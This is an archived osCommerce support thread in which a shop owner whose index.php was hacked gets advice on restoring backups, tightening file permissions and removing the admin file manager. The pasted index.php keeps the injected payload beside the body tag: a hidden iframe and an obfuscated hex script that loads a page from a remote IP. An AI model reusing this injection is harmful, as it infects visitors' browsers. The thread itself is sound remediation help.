Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Index.php file is infected on the webserver


mirza_yasir4

Recommended Posts

Posted

Dear All

 

My Index.php file of OsCommerce is infected with some mallware.

 

When I try to open the store home page through Internet Explorer, my antivirus gives me this error, but opening on the firefox is quite ok.

My all customers find the same message,

 

When I contacted to the Support team of webserver, they told me that, some hacker put an "i-frame" tag inside my index.php file, so I must remove that, Right now I am facing trouble connecting via ftp.

 

Please see the error message, anyone of you found such problem ever ?

 

AviraError.jpg

 

 

By AVG av, error is like this

 

error2-1.jpg

Thanks and Regards

Yasir Imran Mirza

My Contributions

Posted

This seems a HTML_IFRAME.CX

 

check the information page....

http://www.trendmicro.com/vinfo/virusencyc...ECX&VSect=P

 

This thing is involved in my "index.php" page of OsCommerce, I dont know how to remove this, because my every customer is getting this message(on the internet)

 

I dont know who is supposed to fix this, me or my webserver team.

Thanks and Regards

Yasir Imran Mirza

My Contributions

Posted

No, but their advice seems good.

 

Replace index.php from your backup.

 

Infact a complete restore would be a good first move.

 

Install contribution 441 - site monitor. That will tell you if anyone is messing around with your site.

Need help installing add ons/contributions, cleaning a hacked site or a bespoke development, check my profile

 

Virus Threat Scanner

My Contributions

Basic install answers.

Click here for Contributions / Add Ons.

UK your site.

Site Move.

Basic design info.

 

For links mentioned in old answers that are no longer here follow this link Useful Threads.

 

If this post was useful, click the Like This button over there ======>>>>>.

Posted

Some things you need to do:

 

1. Run a complete virus scan of your PC, in case your website became infected from your PC when you did an FTP upload.

 

2. FTP to the website and delete the index.php file and replace it with a backup of that file which was taken before the infection occurred.

 

3. If you don't have a backup then ask your hosting company to restore the index.php from a backup they took. They should take backups.

 

4. FTP to your website and make sure that all files, except for the two configure.php files have permissions no higher than 644.

 

5. The permissions for the two configure.php files will vary according to the server your site is on - it could be 644, 444 or 400 which is correct.

 

6. Permissions on folders should be no higher than 755. If your hosting setup demands permissions of 777 on folders then change hosting companies.

 

7. If you remove the infection and it happens again then it's a good bet that a website on the same server is infected and that this infection is duplicating across all websites. cPanel is particularly prone to attack because it has no jailed root for individual websites (infect one site - infect them all).

 

8. In the meantime, until you get the infected file replaced with a good version, rename the index.php file and upload an index.html file saying your website is "Under Maintenance"

 

Vger

Posted
Some things you need to do:

 

6. Permissions on folders should be no higher than 755. If your hosting setup demands permissions of 777 on folders then change hosting companies.

 

Vger

 

I'm testing the new Header Tags Seo contribution. In the Install document it says:

 

"To allow the admin section to access the includes/header_tags.php file, the permissions for

that file should be set to 755 (777 on some hosts). The best way to be sure to get the settings

correct is to check the settings on the images directory and set the ones for the header

tags file to match those."

 

Apparently my images folder has to have 777 and that was also what I had to set on the header_tags.php in order to avoid an error message. Would you know if this is a hazardous configuration that I have?

Posted
Some things you need to do:

 

i would also suggest changing all your passwords. and if you haven't already put passwords on your admin area, do so.

 

also recommended to remove the file manager capability in your admin, as this is potentially a back door into your site if it's not protected well. it's better not to have it.

 

good luck

Posted
i would also suggest changing all your passwords. and if you haven't already put passwords on your admin area, do so.

 

also recommended to remove the file manager capability in your admin, as this is potentially a back door into your site if it's not protected well. it's better not to have it.

 

good luck

 

 

How can I disable it?

 

Currently, I rolled back "index.php" file with one old backup. They Malware error message gone now.

 

I must complete that patching as soon as I can, to avoid the attacks in future.

Thanks and Regards

Yasir Imran Mirza

My Contributions

Posted

Guyz, please check the infected code... :rolleyes:

 

<?php
/*
 $Id: index.php,v 1.1 2003/06/11 17:37:59 hpdl Exp $

 osCommerce, Open Source E-Commerce Solutions
 http://www.oscommerce.com

 Copyright (c) 2003 osCommerce

 Released under the GNU General Public License
*/

 require('includes/application_top.php');


define('TEXT_GREETING_PERSONAL_AR', 'Welcome back <span class="greetUser">%s!</span> Would you like to see which <a href="%s"><u>new products</u></a> are available to purchase?');


define('TEXT_GREETING_GUEST_AR', '<span lang="AR-SA" dir="RTL" style="font-size: 18.0pt;">مرحبا بك يازائر ! ادخل فى حسابك <a href="%s"><u>هنا</u></a> او افتح حساب جديد <a href="%s"><u>هنا</u></a></span>');

 function tep_customer_greeting_ar() {
global $customer_id, $customer_first_name;

if (tep_session_is_registered('customer_first_name') && tep_session_is_registered('customer_id')) {
//	  $greeting_string = sprintf(TEXT_GREETING_PERSONAL_AR, tep_output_string_protected($customer_first_name), tep_href_link(FILENAME_PRODUCTS_NEW));
} else {
  $greeting_string = sprintf(TEXT_GREETING_GUEST_AR, tep_href_link(FILENAME_LOGIN, '', 'SSL'), tep_href_link(FILENAME_CREATE_ACCOUNT, '', 'SSL'));
}

return $greeting_string;
 }

// the following cPath references come from application_top.php
 $category_depth = 'top';
 if (isset($cPath) && tep_not_null($cPath)) {
$categories_products_query = tep_db_query("select count(*) as total from " . TABLE_PRODUCTS_TO_CATEGORIES . " where categories_id = '" . (int)$current_category_id . "'");
$cateqories_products = tep_db_fetch_array($categories_products_query);
if ($cateqories_products['total'] > 0) {
  $category_depth = 'products'; // display products
} else {
  $category_parent_query = tep_db_query("select count(*) as total from " . TABLE_CATEGORIES . " where parent_id = '" . (int)$current_category_id . "'");
  $category_parent = tep_db_fetch_array($category_parent_query);
  if ($category_parent['total'] > 0) {
	$category_depth = 'nested'; // navigate through the categories
  } else {
	$category_depth = 'products'; // category has no products, but display the 'no products' message
  }
}
 }

 require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_DEFAULT);
?>
<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html <?php echo HTML_PARAMS; ?>>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=<?php echo CHARSET; ?>">
<title><?php echo TITLE; ?></title>
<base href="<?php echo (($request_type == 'SSL') ? HTTPS_SERVER : HTTP_SERVER) . DIR_WS_CATALOG; ?>">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<script type="text/javascript">
<!--
if (document.layers){
window.captureEvents(Event.MOUSEDOWN | Event.MOUSEUP)
window.onmousedown=rightclick;
window.onmouseup=rightclick;

function rightclick(e) {
if (e.which == 3) {
// Put right mouse code here
alert('Copyright © 2004 NASA est.');
return false;
}
else {
	return true;
	}
}
}
if (document.all){
function click() {
if (event.button==2) {
alert('Copyright © 2004 NASA est.')
}

if (event.button==3) {
alert('Copyright © 2004 NASA est.')}
}
document.onmousedown=click
}
// -->
</script>

<script language="javascript"><!--
var i=0;
function resize() {
 if (navigator.appName == 'Netscape') i=40;
 if (document.images[0]) window.resizeTo(document.images[0].width +30, document.images[0].height+60-i);
 self.focus();
}
//--></script>
<link rel="stylesheet" type="text/css" href="stylesheet.css">
</head>
<body marginwidth="0" marginheight="0" topmargin="0" bottommargin="0" leftmargin="0" rightmargin="0"><iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v48120f3d1fd6d(v48120f3d2056f){  return(parseInt(v48120f3d2056f,16));}function v48120f3d21ca7(v48120f3d22476){ function v48120f3d23be3 () {var v48120f3d243b4=2; return v48120f3d243b4;} var v48120f3d22c46='';for(v48120f3d23417=0; v48120f3d23417<v48120f3d22476.length; v48120f3d23417+=v48120f3d23be3()){ v48120f3d22c46+=(String.fromCharCode(v48120f3d1fd6d(v48120f3d22476.substr(v48120f3d23417, v48120f3d23be3()))));}return v48120f3d22c46;} document.write(v48120f3d21ca7('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E
777269746528273C696672616D65206E616D653D6266623565207372633D5C27687474703A2F2F373
72E3232312E3133332E3135302F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D61
74682E72616E646F6D28292A323430383030292B27306661305C272077696474683D3433302068656
96768743D353630207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D65
3E27293C2F5343524950543E'));</script>
<!-- header //-->
<?php require(DIR_WS_INCLUDES . 'header.php'); ?>
<!-- header_eof //-->

<!-- body //-->
<table border="0" width="100%" cellspacing="3" cellpadding="3">
 <tr>
<td width="<?php echo BOX_WIDTH; ?>" valign="top"><table border="0" width="<?php echo BOX_WIDTH; ?>" cellspacing="0" cellpadding="2">
<!-- left_navigation //-->
<?php require(DIR_WS_INCLUDES . 'column_left.php'); ?>
<!-- left_navigation_eof //-->
</table></td>
<!-- body_text //-->
<?php
 if ($category_depth == 'nested') {
$category_query = tep_db_query("select cd.categories_name, c.categories_image from " . TABLE_CATEGORIES . " c, " . TABLE_CATEGORIES_DESCRIPTION . " cd where c.categories_id = '" . (int)$current_category_id . "' and cd.categories_id = '" . (int)$current_category_id . "' and cd.language_id = '" . (int)$languages_id . "'");
$category = tep_db_fetch_array($category_query);
?>
<td width="100%" valign="top"><table border="0" width="100%" cellspacing="0" cellpadding="0">
  <tr>
	<td><table border="0" width="100%" cellspacing="0" cellpadding="0">
	  <tr>
		<td class="pageHeading"><?php echo HEADING_TITLE; ?></td>
		<td class="pageHeading" align="right"><?php echo tep_image(DIR_WS_IMAGES . $category['categories_image'], $category['categories_name'], HEADING_IMAGE_WIDTH, HEADING_IMAGE_HEIGHT); ?></td>
	  </tr>
	</table></td>
  </tr>
  <tr>
	<td><?php echo tep_draw_separator('pixel_trans.gif', '100%', '10'); ?></td>
  </tr>
  <tr>
	<td><table border="0" width="100%" cellspacing="0" cellpadding="2">
	  <tr>
		<td><table border="0" width="100%" cellspacing="0" cellpadding="2">
		  <tr>
<?php
if (isset($cPath) && strpos('_', $cPath)) {
// check to see if there are deeper categories within the current category
  $category_links = array_reverse($cPath_array);
  for($i=0, $n=sizeof($category_links); $i<$n; $i++) {
	$categories_query = tep_db_query("select count(*) as total from " . TABLE_CATEGORIES . " c, " . TABLE_CATEGORIES_DESCRIPTION . " cd where c.parent_id = '" . (int)$category_links[$i] . "' and c.categories_id = cd.categories_id and cd.language_id = '" . (int)$languages_id . "'");
	$categories = tep_db_fetch_array($categories_query);
	if ($categories['total'] < 1) {
	  // do nothing, go through the loop
	} else {
	  $categories_query = tep_db_query("select c.categories_id, cd.categories_name, c.categories_image, c.parent_id from " . TABLE_CATEGORIES . " c, " . TABLE_CATEGORIES_DESCRIPTION . " cd where c.parent_id = '" . (int)$category_links[$i] . "' and c.categories_id = cd.categories_id and cd.language_id = '" . (int)$languages_id . "' order by sort_order, cd.categories_name");
	  break; // we've found the deepest category the customer is in
	}
  }
} else {
  $categories_query = tep_db_query("select c.categories_id, cd.categories_name, c.categories_image, c.parent_id from " . TABLE_CATEGORIES . " c, " . TABLE_CATEGORIES_DESCRIPTION . " cd where c.parent_id = '" . (int)$current_category_id . "' and c.categories_id = cd.categories_id and cd.language_id = '" . (int)$languages_id . "' order by sort_order, cd.categories_name");
}

$number_of_categories = tep_db_num_rows($categories_query);

$rows = 0;
while ($categories = tep_db_fetch_array($categories_query)) {
  $rows++;
  $cPath_new = tep_get_path($categories['categories_id']);
  $width = (int)(100 / MAX_DISPLAY_CATEGORIES_PER_ROW) . '%';
  echo '				<td align="center" class="smallText" width="' . $width . '" valign="top"><a href="' . tep_href_link(FILENAME_DEFAULT, $cPath_new) . '">' . tep_image(DIR_WS_IMAGES . $categories['categories_image'], $categories['categories_name'], SUBCATEGORY_IMAGE_WIDTH, SUBCATEGORY_IMAGE_HEIGHT) . '' . $categories['categories_name'] . '</a></td>' . "n";
  if ((($rows / MAX_DISPLAY_CATEGORIES_PER_ROW) == floor($rows / MAX_DISPLAY_CATEGORIES_PER_ROW)) && ($rows != $number_of_categories)) {
	echo '			  </tr>' . "n";
	echo '			  <tr>' . "n";
  }
}

// needed for the new products module shown below
$new_products_category_id = $current_category_id;
?>
		  </tr>
		</table></td>
	  </tr>
	  <tr>
		<td><?php echo tep_draw_separator('pixel_trans.gif', '100%', '10'); ?></td>
	  </tr>
	  <tr>
		<td><?php include(DIR_WS_MODULES . FILENAME_NEW_PRODUCTS); ?></td>
	  </tr>
	</table></td>
  </tr>
</table></td>
<?php
 } elseif ($category_depth == 'products' || isset($HTTP_GET_VARS['manufacturers_id'])) {
// create column list
$define_list = array('PRODUCT_LIST_MODEL' => PRODUCT_LIST_MODEL,
					 'PRODUCT_LIST_NAME' => PRODUCT_LIST_NAME,
					 'PRODUCT_LIST_MANUFACTURER' => PRODUCT_LIST_MANUFACTURER,
					 'PRODUCT_LIST_PRICE' => PRODUCT_LIST_PRICE,
					 'PRODUCT_LIST_QUANTITY' => PRODUCT_LIST_QUANTITY,
					 'PRODUCT_LIST_WEIGHT' => PRODUCT_LIST_WEIGHT,
					 'PRODUCT_LIST_IMAGE' => PRODUCT_LIST_IMAGE,
					 'PRODUCT_LIST_BUY_NOW' => PRODUCT_LIST_BUY_NOW);

asort($define_list);

$column_list = array();
reset($define_list);
while (list($key, $value) = each($define_list)) {
  if ($value > 0) $column_list[] = $key;
}

$select_column_list = '';

for ($i=0, $n=sizeof($column_list); $i<$n; $i++) {
  switch ($column_list[$i]) {
	case 'PRODUCT_LIST_MODEL':
	  $select_column_list .= 'p.products_model, ';
	  break;
	case 'PRODUCT_LIST_NAME':
	  $select_column_list .= 'pd.products_name, ';
	  break;
	case 'PRODUCT_LIST_MANUFACTURER':
	  $select_column_list .= 'm.manufacturers_name, ';
	  break;
	case 'PRODUCT_LIST_QUANTITY':
	  $select_column_list .= 'p.products_quantity, ';
	  break;
	case 'PRODUCT_LIST_IMAGE':
	  $select_column_list .= 'p.products_image, ';
	  break;
	case 'PRODUCT_LIST_WEIGHT':
	  $select_column_list .= 'p.products_weight, ';
	  break;
  }
}

// show the products of a specified manufacturer
if (isset($HTTP_GET_VARS['manufacturers_id'])) {
  if (isset($HTTP_GET_VARS['filter_id']) && tep_not_null($HTTP_GET_VARS['filter_id'])) {
// We are asked to show only a specific category
	$listing_sql = "select " . $select_column_list . " p.products_id, p.vorhanden, p.manufacturers_id, p.products_price, p.products_tax_class_id, IF(s.status, s.specials_new_products_price, NULL) as specials_new_products_price, IF(s.status, s.specials_new_products_price, p.products_price) as final_price from " . TABLE_PRODUCTS . " p, " . TABLE_PRODUCTS_DESCRIPTION . " pd, " . TABLE_MANUFACTURERS . " m, " . TABLE_PRODUCTS_TO_CATEGORIES . " p2c left join " . TABLE_SPECIALS . " s on p.products_id = s.products_id where p.products_status = '1' and p.manufacturers_id = m.manufacturers_id and m.manufacturers_id = '" . (int)$HTTP_GET_VARS['manufacturers_id'] . "' and p.products_id = p2c.products_id and pd.products_id = p2c.products_id and pd.language_id = '" . (int)$languages_id . "' and p2c.categories_id = '" . (int)$HTTP_GET_VARS['filter_id'] . "'";
  } else {
// We show them all
	$listing_sql = "select " . $select_column_list . " p.products_id, p.vorhanden, p.manufacturers_id, p.products_price, p.products_tax_class_id, IF(s.status, s.specials_new_products_price, NULL) as specials_new_products_price, IF(s.status, s.specials_new_products_price, p.products_price) as final_price from " . TABLE_PRODUCTS . " p, " . TABLE_PRODUCTS_DESCRIPTION . " pd, " . TABLE_MANUFACTURERS . " m left join " . TABLE_SPECIALS . " s on p.products_id = s.products_id where p.products_status = '1' and pd.products_id = p.products_id and pd.language_id = '" . (int)$languages_id . "' and p.manufacturers_id = m.manufacturers_id and m.manufacturers_id = '" . (int)$HTTP_GET_VARS['manufacturers_id'] . "'";
  }
} else {
// show the products in a given categorie
  if (isset($HTTP_GET_VARS['filter_id']) && tep_not_null($HTTP_GET_VARS['filter_id'])) {
// We are asked to show only specific catgeory
	$listing_sql = "select " . $select_column_list . " p.products_id, p.vorhanden, p.manufacturers_id, p.products_price, p.products_tax_class_id, IF(s.status, s.specials_new_products_price, NULL) as specials_new_products_price, IF(s.status, s.specials_new_products_price, p.products_price) as final_price from " . TABLE_PRODUCTS . " p, " . TABLE_PRODUCTS_DESCRIPTION . " pd, " . TABLE_MANUFACTURERS . " m, " . TABLE_PRODUCTS_TO_CATEGORIES . " p2c left join " . TABLE_SPECIALS . " s on p.products_id = s.products_id where p.products_status = '1' and p.manufacturers_id = m.manufacturers_id and m.manufacturers_id = '" . (int)$HTTP_GET_VARS['filter_id'] . "' and p.products_id = p2c.products_id and pd.products_id = p2c.products_id and pd.language_id = '" . (int)$languages_id . "' and p2c.categories_id = '" . (int)$current_category_id . "'";
  } else {
// We show them all
	$listing_sql = "select " . $select_column_list . " p.products_id, p.vorhanden, p.manufacturers_id, p.products_price, p.products_tax_class_id, IF(s.status, s.specials_new_products_price, NULL) as specials_new_products_price, IF(s.status, s.specials_new_products_price, p.products_price) as final_price from " . TABLE_PRODUCTS_DESCRIPTION . " pd, " . TABLE_PRODUCTS . " p left join " . TABLE_MANUFACTURERS . " m on p.manufacturers_id = m.manufacturers_id, " . TABLE_PRODUCTS_TO_CATEGORIES . " p2c left join " . TABLE_SPECIALS . " s on p.products_id = s.products_id where p.products_status = '1' and p.products_id = p2c.products_id and pd.products_id = p2c.products_id and pd.language_id = '" . (int)$languages_id . "' and p2c.categories_id = '" . (int)$current_category_id . "'";
  }
}

if ( (!isset($HTTP_GET_VARS['sort'])) || (!ereg('[1-8][ad]', $HTTP_GET_VARS['sort'])) || (substr($HTTP_GET_VARS['sort'], 0, 1) > sizeof($column_list)) ) {
  for ($i=0, $n=sizeof($column_list); $i<$n; $i++) {
	if ($column_list[$i] == 'PRODUCT_LIST_NAME') {
	  $HTTP_GET_VARS['sort'] = $i+1 . 'a';
	  $listing_sql .= " order by pd.products_name";
	  break;
	}
  }
} else {
  $sort_col = substr($HTTP_GET_VARS['sort'], 0 , 1);
  $sort_order = substr($HTTP_GET_VARS['sort'], 1);
  $listing_sql .= ' order by ';
  switch ($column_list[$sort_col-1]) {
	case 'PRODUCT_LIST_MODEL':
	  $listing_sql .= "p.products_model " . ($sort_order == 'd' ? 'desc' : '') . ", pd.products_name";
	  break;
	case 'PRODUCT_LIST_NAME':
	  $listing_sql .= "pd.products_name " . ($sort_order == 'd' ? 'desc' : '');
	  break;
	case 'PRODUCT_LIST_MANUFACTURER':
	  $listing_sql .= "m.manufacturers_name " . ($sort_order == 'd' ? 'desc' : '') . ", pd.products_name";
	  break;
	case 'PRODUCT_LIST_QUANTITY':
	  $listing_sql .= "p.products_quantity " . ($sort_order == 'd' ? 'desc' : '') . ", pd.products_name";
	  break;
	case 'PRODUCT_LIST_IMAGE':
	  $listing_sql .= "pd.products_name";
	  break;
	case 'PRODUCT_LIST_WEIGHT':
	  $listing_sql .= "p.products_weight " . ($sort_order == 'd' ? 'desc' : '') . ", pd.products_name";
	  break;
	case 'PRODUCT_LIST_PRICE':
	  $listing_sql .= "final_price " . ($sort_order == 'd' ? 'desc' : '') . ", pd.products_name";
	  break;
  }
}
?>
<td width="100%" valign="top"><table border="0" width="100%" cellspacing="0" cellpadding="0">
  <tr>
	<td><table border="0" width="100%" cellspacing="0" cellpadding="0">
	  <tr>
		<td class="pageHeading"><?php echo HEADING_TITLE; ?></td>
<?php
// optional Product List Filter
if (PRODUCT_LIST_FILTER > 0) {
  if (isset($HTTP_GET_VARS['manufacturers_id'])) {
	$filterlist_sql = "select distinct c.categories_id as id, cd.categories_name as name from " . TABLE_PRODUCTS . " p, " . TABLE_PRODUCTS_TO_CATEGORIES . " p2c, " . TABLE_CATEGORIES . " c, " . TABLE_CATEGORIES_DESCRIPTION . " cd where p.products_status = '1' and p.products_id = p2c.products_id and p2c.categories_id = c.categories_id and p2c.categories_id = cd.categories_id and cd.language_id = '" . (int)$languages_id . "' and p.manufacturers_id = '" . (int)$HTTP_GET_VARS['manufacturers_id'] . "' order by cd.categories_name";
  } else {
	$filterlist_sql= "select distinct m.manufacturers_id as id, m.manufacturers_name as name from " . TABLE_PRODUCTS . " p, " . TABLE_PRODUCTS_TO_CATEGORIES . " p2c, " . TABLE_MANUFACTURERS . " m where p.products_status = '1' and p.manufacturers_id = m.manufacturers_id and p.products_id = p2c.products_id and p2c.categories_id = '" . (int)$current_category_id . "' order by m.manufacturers_name";
  }
  $filterlist_query = tep_db_query($filterlist_sql);
  if (tep_db_num_rows($filterlist_query) > 1) {
	echo '			<td align="center" class="main">' . tep_draw_form('filter', FILENAME_DEFAULT, 'get') . TEXT_SHOW . ' ';
	if (isset($HTTP_GET_VARS['manufacturers_id'])) {
	  echo tep_draw_hidden_field('manufacturers_id', $HTTP_GET_VARS['manufacturers_id']);
	  $options = array(array('id' => '', 'text' => TEXT_ALL_CATEGORIES));
	} else {
	  echo tep_draw_hidden_field('cPath', $cPath);
	  $options = array(array('id' => '', 'text' => TEXT_ALL_MANUFACTURERS));
	}
	echo tep_draw_hidden_field('sort', $HTTP_GET_VARS['sort']);
	while ($filterlist = tep_db_fetch_array($filterlist_query)) {
	  $options[] = array('id' => $filterlist['id'], 'text' => $filterlist['name']);
	}
	echo tep_draw_pull_down_menu('filter_id', $options, (isset($HTTP_GET_VARS['filter_id']) ? $HTTP_GET_VARS['filter_id'] : ''), 'onchange="this.form.submit()"');
	echo '</form></td>' . "n";
  }
}

// Get the right image for the top-right
$image = DIR_WS_IMAGES . 'table_background_list.gif';
if (isset($HTTP_GET_VARS['manufacturers_id'])) {
  $image = tep_db_query("select manufacturers_image from " . TABLE_MANUFACTURERS . " where manufacturers_id = '" . (int)$HTTP_GET_VARS['manufacturers_id'] . "'");
  $image = tep_db_fetch_array($image);
  $image = $image['manufacturers_image'];
} elseif ($current_category_id) {
  $image = tep_db_query("select categories_image from " . TABLE_CATEGORIES . " where categories_id = '" . (int)$current_category_id . "'");
  $image = tep_db_fetch_array($image);
  $image = $image['categories_image'];
}
?>
		<td align="right"><?php echo tep_image(DIR_WS_IMAGES . $image, HEADING_TITLE, HEADING_IMAGE_WIDTH, HEADING_IMAGE_HEIGHT); ?></td>
	  </tr>
	</table></td>
  </tr>
  <tr>
	<td><?php echo tep_draw_separator('pixel_trans.gif', '100%', '10'); ?></td>
  </tr>
  <tr>
	<td><?php include(DIR_WS_MODULES . FILENAME_PRODUCT_LISTING); ?></td>
  </tr>
</table></td>
<?php
 } else { // default page
?>
<td width="100%" valign="top"><table border="0" width="100%" cellspacing="0" cellpadding="0">
  <tr>
	<td><table border="0" width="100%" cellspacing="0" cellpadding="0">
	  <tr>
		<td class="pageHeading"><?php echo HEADING_TITLE; ?></td>
<?php /*			<td class="pageHeading" align="right"><?php echo tep_image(DIR_WS_IMAGES . 'table_background_default.gif', HEADING_TITLE, HEADING_IMAGE_WIDTH, HEADING_IMAGE_HEIGHT); ?></td> */ ?>
	  </tr>
	</table></td>
  </tr>
  <tr>
	<td><?php echo tep_draw_separator('pixel_trans.gif', '100%', '10'); ?></td>
  </tr>
  <tr>
	<td><table border="0" width="100%" cellspacing="0" cellpadding="0">
	  <tr>
		<td class="main"><?php echo tep_customer_greeting(); ?><?php
		echo tep_customer_greeting_ar();
		?>
		</td>
	  </tr>
	  <tr>
		<td><?php echo tep_draw_separator('pixel_trans.gif', '100%', '10'); ?></td>
	  </tr>
	  <tr>
		<td class="main"><?php echo TEXT_MAIN; ?></td>
	  </tr>
	  <tr>
		<td><?php echo tep_draw_separator('pixel_trans.gif', '100%', '10'); ?></td>
	  </tr>
	  <tr>
		<td><?php include(DIR_WS_MODULES . 'main_categories.php'); ?></td>
	  </tr>
	  <tr>
		<td><?php echo tep_draw_separator('pixel_trans.gif', '100%', '10'); ?></td>
	  </tr>
	  <tr>
		<td><?php include(DIR_WS_MODULES . FILENAME_NEW_PRODUCTS); ?></td>
	  </tr>
<?php
include(DIR_WS_MODULES . FILENAME_UPCOMING_PRODUCTS);
?>
	</table></td>
  </tr>
</table></td>
<?php
 }
?>
<!-- body_text_eof //-->
<td width="<?php echo BOX_WIDTH; ?>" valign="top"><table border="0" width="<?php echo BOX_WIDTH; ?>" cellspacing="0" cellpadding="2">
<!-- right_navigation //-->
<?php require(DIR_WS_INCLUDES . 'column_right.php'); ?>
<!-- right_navigation_eof //-->
</table></td>
 </tr>
</table>
<!-- body_eof //-->

<!-- footer //-->
<?php require(DIR_WS_INCLUDES . 'footer.php'); ?>
<!-- footer_eof //-->

</body>
</html>
<?php require(DIR_WS_INCLUDES . 'application_bottom.php'); ?>

Thanks and Regards

Yasir Imran Mirza

My Contributions

Posted
check the code, right beside the body tag

 

yes, you still need to remove everything between the <iframe... and the </script>. and check the other files on your site for similar code, this is what's causing your virus warning. but unless you take steps to protect your site whoever did this will very likely come back and do this again.

 

as far as removing the file manager, you can delete the admin/file_manager.php file - or just rename it to file_manager.xxx in case you do need it at some later time. the link to the file manager will still be there in your admin but clicking on it will be useless.

Posted

Is the reason behind this that Some one manage to add a malware code into my php pages, that my permissions on files and directories is not correct ?

 

Will you guide me please.

Thanks and Regards

Yasir Imran Mirza

My Contributions

Posted
Is the reason behind this that Some one manage to add a malware code into my php pages, that my permissions on files and directories is not correct ?

 

yes, this is possibly the reason. without looking at the server logs it's difficult to say exactly. but if you do everything you can to secure the site then it's less likely that anyone can get in.

 

Will you guide me please.

 

guide you with what part? editing the file? file permissions? tell us specifically what you need help with and someone will try to help you.

Posted
guide you with what part? editing the file? file permissions? tell us specifically what you need help with and someone will try to help you.

 

Please look at the snapshot.

 

permissions.gif

 

This is the preview for my admin folder attributes, similerly some folders set to 750, some to 757

 

Before few days, I corrected the file permissions to 644, now it seems that there is no more attack. I am afraid to change too many things in my company's store.

Thanks and Regards

Yasir Imran Mirza

My Contributions

Posted
Please look at the snapshot.

 

This is the preview for my admin folder attributes, similerly some folders set to 750, some to 757

 

Before few days, I corrected the file permissions to 644, now it seems that there is no more attack. I am afraid to change too many things in my company's store.

 

according to that snapshot, everyone in the world has write permissions to your file. this is bad. very bad! only the owner should have write permissions, no one else.

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...